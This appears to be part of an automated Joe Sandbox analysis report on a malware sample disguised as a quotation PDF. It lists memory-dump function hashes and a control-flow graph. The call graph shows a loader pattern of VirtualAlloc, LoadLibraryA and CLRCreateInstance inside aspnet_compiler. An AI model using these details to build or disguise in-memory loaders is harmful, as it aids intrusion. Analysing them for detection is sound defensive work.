                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0de417044c01fc652340d712f26810ca06172913fc547b73e30da03867d4c487
                                                                • Instruction ID: 5f44e0befc7d8d2097abc52a98eb77acd6f04c2ea9c9df6f16fe51c470ae6b23
                                                                • Opcode Fuzzy Hash: 0de417044c01fc652340d712f26810ca06172913fc547b73e30da03867d4c487
                                                                • Instruction Fuzzy Hash: 29218B32A0961DCFDF15EF9CD8695E93BA0FF18319F4402B6D01CC7192EE29A242C781
                                                                Function 00007FFD9B890B49 Relevance: .1, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce217c21353faadcddab8869c2a60cdafc81e6700103573fbf2a5716a0ee278d
                                                                • Instruction ID: 78fe69472a48d3d5e7adc3619fba0a00e699cd6c049a9f4532d8346bda5bd769
                                                                • Opcode Fuzzy Hash: ce217c21353faadcddab8869c2a60cdafc81e6700103573fbf2a5716a0ee278d
                                                                • Instruction Fuzzy Hash: DD212830A0968E8FDF85DF64C8556E77FF2FF99300F1441AAE819C7295CA34A942C780
                                                                Function 00007FFD9B89A97D Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bed3d21b2305b8a34600f3de3744ea7c20bff733ea3a3f7ace2c665d8bedf002
                                                                • Instruction ID: ff3bee7c7806f2d14fbb79c50792099e5a83359799a61c9f721c5e66e67c4775
                                                                • Opcode Fuzzy Hash: bed3d21b2305b8a34600f3de3744ea7c20bff733ea3a3f7ace2c665d8bedf002
                                                                • Instruction Fuzzy Hash: E7210371A0A61DDFDB55EF98C8A59ED37F0FF14308B0402A2D428DB1A2FE35A651CB90
                                                                Function 00007FFD9B890A71 Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f6eca506653fb0cb03b50459f4c9dddf24dcf7af139ced579ace8d3d371ddef
                                                                • Instruction ID: 053604ca5a8713fa85b5fc7b5f5cd339bbb9af1b3af5be6b18c31ad2c34cc87a
                                                                • Opcode Fuzzy Hash: 3f6eca506653fb0cb03b50459f4c9dddf24dcf7af139ced579ace8d3d371ddef
                                                                • Instruction Fuzzy Hash: 62210422F2E95E8EFFB497A858312F97AD2EF4C719F0601B6D45CC30E2DD186B194681
                                                                Function 00007FFD9B894930 Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f325923b076ee86bcf1a214a21d2f9cbbef27492134b4c99f8014f84b8b8c07
                                                                • Instruction ID: 4a9895a8e33733c801d6e706f98f574406ebda4bc40ec3ac7c94437ab748728d
                                                                • Opcode Fuzzy Hash: 0f325923b076ee86bcf1a214a21d2f9cbbef27492134b4c99f8014f84b8b8c07
                                                                • Instruction Fuzzy Hash: EA210731B0D95F4EEF69EBA8A4606FE7BB0EF4A314F05017AC04CD71A6CE2465418790
                                                                Function 00007FFD9B9D3545 Relevance: .1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef07ab1c7ba21fd66b19e96dcad33c0d10e6a9a033b8e8d888a7b4bceadb8619
                                                                • Instruction ID: 063b6beec075774b685731fb3989c5e57508b4f5a8a7cfb98d5177e3ff17a2a3
                                                                • Opcode Fuzzy Hash: ef07ab1c7ba21fd66b19e96dcad33c0d10e6a9a033b8e8d888a7b4bceadb8619
                                                                • Instruction Fuzzy Hash: 19215E70E19A1E9FEFA0DF9888957E977B1FFA8301F504176D44CE3260CA346A818B90
                                                                Function 00007FFD9B890DCE Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09c6ab5fa460dd30cfd016b6b7cb081e9960bc1568f2414de306ceb5f519d74a
                                                                • Instruction ID: 4783bf9c4e0f5d5136f9bc1e5d3beb2ceeecd75854580d4a940422c7ba756b23
                                                                • Opcode Fuzzy Hash: 09c6ab5fa460dd30cfd016b6b7cb081e9960bc1568f2414de306ceb5f519d74a
                                                                • Instruction Fuzzy Hash: 6C01D472B0C9194FAB48BA9CB8169FC73D1EB99321B10017AE01ED31DBED19680343C1
                                                                Function 00007FFD9B89A0F5 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ac00019254bbc8ded96f8a3a22b77f88df7cbdf364d5f498b456da4ab8b6328
                                                                • Instruction ID: bf3b922eb4dc3cc49bc3b9d4559b952e0b45b1e5cfbfa1b140758d11ca11feae
                                                                • Opcode Fuzzy Hash: 2ac00019254bbc8ded96f8a3a22b77f88df7cbdf364d5f498b456da4ab8b6328
                                                                • Instruction Fuzzy Hash: 58114970A09A4D8FDB85EF68D869AE97BF0FF58305F040667E41DC31A1DA34A584CB81
                                                                Function 00007FFD9B9D3C0B Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 850dd3c3567b6a5160cae706aa67268b863e4939e7192873eb15bb8549dc1d9e
                                                                • Instruction ID: 479d4528f56eca080ada7ccdfd1bd33930e476b79bf027293afbac632ca467f7
                                                                • Opcode Fuzzy Hash: 850dd3c3567b6a5160cae706aa67268b863e4939e7192873eb15bb8549dc1d9e
                                                                • Instruction Fuzzy Hash: A8216430A15A1DCFDB64EFA8C4A56ACB7B2FF59301F51057DE409A32A1CB756D42CB40
                                                                Function 00007FFD9B89A1BD Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05b085738c64efec05c55e6058a6ec64b0edf66c97d3eefe735c48f88d1287cd
                                                                • Instruction ID: 7a78634eb7d9d8e571500b5e0e3c88aa7bd6a5d2b71b399b2b9063c51fcb069e
                                                                • Opcode Fuzzy Hash: 05b085738c64efec05c55e6058a6ec64b0edf66c97d3eefe735c48f88d1287cd
                                                                • Instruction Fuzzy Hash: 91118B30A19A4D8FDF45EF68C859AE97BE0FF58305F0002A7E41DC31A2CB30A584CB80
                                                                Function 00007FFD9B9D3650 Relevance: .1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ffc9648b7c47521676760cad71aa2df57336d876f87dfbee65485513eeec983e
                                                                • Instruction ID: 81bb68712a6099b93e1939df88bfd699acec2f37b03d72bb981b116d032e8785
                                                                • Opcode Fuzzy Hash: ffc9648b7c47521676760cad71aa2df57336d876f87dfbee65485513eeec983e
                                                                • Instruction Fuzzy Hash: 39215170E1991D9FEFA4DF98C8957A977B1FF58301F504179D40CA3260CB346A81CB90
                                                                Function 00007FFD9B89F1B4 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93117c2fe3f2756d3ed326610dce733242809349ea8c2e5bbece757186ec4c1e
                                                                • Instruction ID: a2208759967fdeb13f3975d5900c4913c81e801c6de0fe6a59e50dbee2105a5b
                                                                • Opcode Fuzzy Hash: 93117c2fe3f2756d3ed326610dce733242809349ea8c2e5bbece757186ec4c1e
                                                                • Instruction Fuzzy Hash: 2E21F3B0E4A12E8AEB74EB54C9587E9B7B1EB98301F0142E9D04DA2291CB795B848F00
                                                                Function 00007FFD9B89B4C0 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b1c4df3a0838844e2d9b86f81578aad5a4cafac600f6e51c2be14985fdc9244
                                                                • Instruction ID: 72a1b2a166de424573d97378ccda4d6a4dd0dc9a4b1f8b34f9a46a5cc55c137c
                                                                • Opcode Fuzzy Hash: 9b1c4df3a0838844e2d9b86f81578aad5a4cafac600f6e51c2be14985fdc9244
                                                                • Instruction Fuzzy Hash: 25010930918A1D8FDF94EF68C859AEA77F0FF68305F00066AE41DD32A1DB34A550CB81
                                                                Function 00007FFD9B9D3B9C Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5dcfccd5568c38dd580cb6a105d5075f3a496443e7e6173fc81a39ad1eb12531
                                                                • Instruction ID: b628e37243640a34c3f36d979fb0a4d40e872afc5eb463bc49aea9d7f7817dec
                                                                • Opcode Fuzzy Hash: 5dcfccd5568c38dd580cb6a105d5075f3a496443e7e6173fc81a39ad1eb12531
                                                                • Instruction Fuzzy Hash: E011E330A1660ECFDB68DF94C0A1AED7BB2EF59341F51013DE409A62A1CB796D81CB90
                                                                Function 00007FFD9B9D314D Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2227770196.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 66e6aa55c323539b05829450e72603e78d2f590cc36c70d0634593c02d296c2c
                                                                • Instruction ID: 063d7fcfdac90dfcee520fd80d3e73e604758cd1734c8b9445a68aa31e7bc4a3
                                                                • Opcode Fuzzy Hash: 66e6aa55c323539b05829450e72603e78d2f590cc36c70d0634593c02d296c2c
                                                                • Instruction Fuzzy Hash: 0B011E70E1951E9FEFA4DF98C8957AD77B1FF98301F51417AD00CA21A0CB386A81CB90
                                                                Function 00007FFD9B894155 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11c331a92d9c81750ab0231de1371b7fcf7d3f05df350ee6fd397db8008630aa
                                                                • Instruction ID: f4a5b33d154dc6fb1c08c9dd6d5458e452b7535c3372676cd60eb745f471906b
                                                                • Opcode Fuzzy Hash: 11c331a92d9c81750ab0231de1371b7fcf7d3f05df350ee6fd397db8008630aa
                                                                • Instruction Fuzzy Hash: ACF05430A05A0D9FEFA1EF98D4596EE7BE0FF5C305F110536E41CC21A0DA346290C781
                                                                Function 00007FFD9B894178 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48c30a7a34d05c06bdbb22facbc66076e90c8bba7d18cd034b2c780ec2116151
                                                                • Instruction ID: 08e2b8c1305b7b797fd9217e6042df317e9fe83ee3e7f4cf04592b642337fc6d
                                                                • Opcode Fuzzy Hash: 48c30a7a34d05c06bdbb22facbc66076e90c8bba7d18cd034b2c780ec2116151
                                                                • Instruction Fuzzy Hash: 37F01C30915A4D9FEB94EFA8C8596EA7BE0FF18305F414566E81CC21A4DA34A6A0CB81
                                                                Function 00007FFD9B890A4E Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4c90ea6c2e3bc502247eb2fc706a0914dba82aa9f81dcb70a2631d745fee2a3c
                                                                • Instruction ID: 9678c317b4527fa0b677fbf67692b3667dbd81e7b0519c08ea1c2f82cf53ff91
                                                                • Opcode Fuzzy Hash: 4c90ea6c2e3bc502247eb2fc706a0914dba82aa9f81dcb70a2631d745fee2a3c
                                                                • Instruction Fuzzy Hash: 4EC08053B5D50D57DF54564874714ED1BD2D7F86F4FC8013EF05D811A5EC1557820341
                                                                Function 00007FFD9B890C04 Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 209474151dabefd1f8caa4d3ed0116c677b17f14858fa9bcac594f20a74c4598
                                                                • Instruction ID: 5319c33d55666e04e2986f6595778b804528ec4e2f4654ac97b52d34bce8ea66
                                                                • Opcode Fuzzy Hash: 209474151dabefd1f8caa4d3ed0116c677b17f14858fa9bcac594f20a74c4598
                                                                • Instruction Fuzzy Hash: F2A01237B4101DC08F2041C474000FDB310D784225B510033C23D810004511212401C0

                                                                Non-executed Functions

                                                                Function 00007FFD9B8951D3 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2226753444.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffd9b890000_QUOTATION_NOVQTRA071244PDF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e81045d8455119dd73bb0e8ca94130185b0a626a971abadde86a6302c3a2c441
                                                                • Instruction ID: 2f120f7b3b5349bd2dbbcc2ea16cfff934dcf668e6bd67ff717dbfd0638e49e6
                                                                • Opcode Fuzzy Hash: e81045d8455119dd73bb0e8ca94130185b0a626a971abadde86a6302c3a2c441
                                                                • Instruction Fuzzy Hash: 58316D57B0A83E06831E75BEBD595FDB700CEC223770487F7C29ACA09B5C06488B56E5

                                                                Execution Graph

                                                                Execution Coverage:20.7%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:60
                                                                Total number of Limit Nodes:2
                                                                execution_graph 6140 1904eee279c 6141 1904eee27c5 6140->6141 6142 1904eee2800 VirtualAlloc 6141->6142 6153 1904eee2819 6141->6153 6143 1904eee2845 6142->6143 6142->6153 6145 1904eee2910 6143->6145 6143->6153 6155 1904eee3fb4 6143->6155 6145->6153 6154 1904eee29c7 6145->6154 6167 1904eee1704 6145->6167 6147 1904eee29ae 6147->6153 6174 1904eee1830 6147->6174 6148 1904eee2ae9 6179 1904eee2fa8 6148->6179 6149 1904eee2a99 6149->6153 6159 1904eee2528 6149->6159 6154->6148 6154->6149 6154->6153 6158 1904eee3fd2 6155->6158 6156 1904eee407d LoadLibraryA 6157 1904eee4085 6156->6157 6157->6143 6158->6156 6158->6157 6160 1904eee2565 CLRCreateInstance 6159->6160 6163 1904eee257e 6159->6163 6160->6163 6162 1904eee262d 6162->6153 6163->6162 6164 1904eee268b SysAllocString 6163->6164 6165 1904eee265f 6163->6165 6164->6165 6165->6162 6165->6165 6166 1904eee2771 SafeArrayDestroy 6165->6166 6166->6162 6168 1904eee3fb4 LoadLibraryA 6167->6168 6169 1904eee1723 6168->6169 6170 1904eee172b 6169->6170 6189 1904eee409c 6169->6189 6170->6147 6172 1904eee174a 6172->6170 6173 1904eee409c LoadLibraryA 6172->6173 6173->6170 6175 1904eee3fb4 LoadLibraryA 6174->6175 6176 1904eee184e 6175->6176 6177 1904eee409c LoadLibraryA 6176->6177 6178 1904eee1863 6177->6178 6178->6154 6183 1904eee2ffc 6179->6183 6180 1904eee3fb4 LoadLibraryA 6180->6183 6181 1904eee3fb4 LoadLibraryA 6182 1904eee3459 6181->6182 6182->6181 6185 1904eee409c LoadLibraryA 6182->6185 6186 1904eee34f8 6182->6186 6183->6180 6183->6182 6184 1904eee409c LoadLibraryA 6183->6184 6187 1904eee3830 6183->6187 6184->6183 6185->6182 6186->6187 6199 1904eee3d58 6186->6199 6187->6153 6190 1904eee40d2 6189->6190 6192 1904eee420c 6189->6192 6190->6192 6193 1904eee1f08 6190->6193 6192->6172 6194 1904eee1f74 6193->6194 6196 1904eee1f4b 6193->6196 6195 1904eee1f84 6194->6195 6197 1904eee3fb4 LoadLibraryA 6194->6197 6195->6192 6196->6194 6196->6195 6198 1904eee409c LoadLibraryA 6196->6198 6197->6195 6198->6196 6201 1904eee3d94 6199->6201 6200 1904eee3f90 6200->6187 6201->6200 6202 1904eee409c LoadLibraryA 6201->6202 6202->6201 6203 1904eee2566 CLRCreateInstance 6204 1904eee257e 6203->6204 6205 1904eee262d 6204->6205 6206 1904eee268b SysAllocString 6204->6206 6207 1904eee265f 6204->6207 6206->6207 6207->6205 6207->6207 6208 1904eee2771 SafeArrayDestroy 6207->6208 6208->6205

                                                                Executed Functions

                                                                Function 000001904EEE279C Relevance: 1.6, APIs: 1, Instructions: 382memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 53 1904eee279c-1904eee27f4 call 1904eee4244 * 3 60 1904eee2826 53->60 61 1904eee27f6-1904eee27f9 53->61 63 1904eee2829-1904eee2844 60->63 61->60 62 1904eee27fb-1904eee27fe 61->62 62->60 64 1904eee2800-1904eee2817 VirtualAlloc 62->64 65 1904eee2819-1904eee2820 64->65 66 1904eee2845-1904eee286e call 1904eee47c4 call 1904eee47e4 64->66 65->60 67 1904eee2822 65->67 72 1904eee28aa-1904eee28c0 call 1904eee4244 66->72 73 1904eee2870-1904eee28a4 call 1904eee43f8 call 1904eee42b8 66->73 67->60 72->60 79 1904eee28c6-1904eee28c7 72->79 73->72 82 1904eee2aff-1904eee2b00 73->82 81 1904eee28cd-1904eee28d3 79->81 83 1904eee28d5 81->83 84 1904eee2910-1904eee291b 81->84 87 1904eee2b05-1904eee2b16 82->87 88 1904eee28d7-1904eee28d9 83->88 85 1904eee291d-1904eee2937 call 1904eee4244 84->85 86 1904eee2950-1904eee2959 84->86 104 1904eee2939-1904eee2940 85->104 105 1904eee2946-1904eee294e 85->105 90 1904eee297a-1904eee2983 86->90 91 1904eee295b-1904eee296b call 1904eee18c0 86->91 92 1904eee2b18-1904eee2b22 87->92 93 1904eee2b49-1904eee2b6a call 1904eee47e4 87->93 94 1904eee28db-1904eee28e1 88->94 95 1904eee28f2-1904eee28f4 88->95 90->87 101 1904eee2989-1904eee2993 90->101 91->87 111 1904eee2971-1904eee2978 91->111 92->93 99 1904eee2b24-1904eee2b42 call 1904eee47e4 92->99 121 1904eee2b6c 93->121 122 1904eee2b70-1904eee2b72 93->122 94->95 100 1904eee28e3-1904eee28f0 94->100 95->84 102 1904eee28f6-1904eee2909 call 1904eee3fb4 95->102 99->93 100->88 100->95 108 1904eee299d-1904eee29a4 101->108 109 1904eee2995-1904eee2996 101->109 115 1904eee290e 102->115 104->82 104->105 105->85 105->86 113 1904eee29d8-1904eee29dc 108->113 114 1904eee29a6-1904eee29b0 call 1904eee1704 108->114 109->108 111->108 117 1904eee2a8f-1904eee2a97 113->117 118 1904eee29e2-1904eee2a0b 113->118 126 1904eee29bf-1904eee29c9 call 1904eee1830 114->126 127 1904eee29b2-1904eee29b9 114->127 115->81 123 1904eee2ae9-1904eee2aef call 1904eee2fa8 117->123 124 1904eee2a99-1904eee2a9f 117->124 118->87 135 1904eee2a11-1904eee2a2b call 1904eee47c4 118->135 121->122 122->63 133 1904eee2af4-1904eee2afb 123->133 129 1904eee2ab6-1904eee2ac8 call 1904eee2528 124->129 130 1904eee2aa1-1904eee2aa7 124->130 126->113 142 1904eee29cb-1904eee29d2 126->142 127->87 127->126 145 1904eee2ada-1904eee2ae7 call 1904eee1fb8 129->145 146 1904eee2aca-1904eee2ad5 call 1904eee2b78 129->146 130->133 134 1904eee2aa9-1904eee2ab4 call 1904eee3a5c 130->134 133->87 138 1904eee2afd 133->138 134->133 148 1904eee2a2d-1904eee2a30 135->148 149 1904eee2a47-1904eee2a8a 135->149 138->138 142->87 142->113 145->133 146->145 148->117 152 1904eee2a32-1904eee2a45 call 1904eee4548 148->152 149->87 156 1904eee2a8c-1904eee2a8d 149->156 152->156 156->117
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001904EEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_1904eec0000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
                                                                • Instruction ID: dd1cb5c940b63808c13d6d0cbf18f1b0d2f06817f805f8b820ebfca73b92982b
                                                                • Opcode Fuzzy Hash: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
                                                                • Instruction Fuzzy Hash: C2C16430618909CFEB6AEE2E84A57E9B3D1FB9C300F140679D54AC7286DB25FD42C781
                                                                Function 00007FFD9B9699B0 Relevance: .3, Instructions: 297COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78697bcb2263ef1f3d95e97516ff91fc15a00b7feb0a842865663b659fa09c69
                                                                • Instruction ID: be41faab51970b12f8852b4a8a61ce2cf144a9daf3c1c35cbfc06a3e9e2a73f8
                                                                • Opcode Fuzzy Hash: 78697bcb2263ef1f3d95e97516ff91fc15a00b7feb0a842865663b659fa09c69
                                                                • Instruction Fuzzy Hash: 37B1F77091961D9FDB94EBA8C859BEDBBF0EF19301F1141B9D00DE7262DA389981CB10
                                                                Function 00007FFD9B969E4D Relevance: .3, Instructions: 273COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 384 7ffd9b969e4d-7ffd9b969e81 385 7ffd9b969e83 384->385 386 7ffd9b969e88-7ffd9b969f25 384->386 385->386 396 7ffd9b96a1af-7ffd9b96a239 386->396 397 7ffd9b969f2b-7ffd9b969f7d 386->397 400 7ffd9b96a241-7ffd9b96a249 396->400 401 7ffd9b96a23b-7ffd9b96a240 396->401 404 7ffd9b969f84-7ffd9b969f8b 397->404 405 7ffd9b969f7f 397->405 401->400 406 7ffd9b969f92-7ffd9b969ffb 404->406 407 7ffd9b969f8d 404->407 405->404 412 7ffd9b96a002-7ffd9b96a0a7 call 7ffd9b966218 406->412 413 7ffd9b969ffd 406->413 407->406 420 7ffd9b96a0ae-7ffd9b96a0ff call 7ffd9b966218 412->420 421 7ffd9b96a0a9 412->421 413->412 424 7ffd9b96a101-7ffd9b96a104 420->424 425 7ffd9b96a158-7ffd9b96a15d 420->425 421->420 426 7ffd9b96a185-7ffd9b96a18a 424->426 427 7ffd9b96a106-7ffd9b96a11a 424->427 429 7ffd9b96a168-7ffd9b96a17c 425->429 428 7ffd9b96a18b-7ffd9b96a192 426->428 427->428 434 7ffd9b96a11c-7ffd9b96a120 427->434 430 7ffd9b96a195-7ffd9b96a19c 428->430 429->430 432 7ffd9b96a17e 429->432 433 7ffd9b96a1a1-7ffd9b96a1a8 call 7ffd9b966220 430->433 432->426 437 7ffd9b96a1ad-7ffd9b96a1ae 433->437 434->433 436 7ffd9b96a122 434->436 436->425 437->396
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
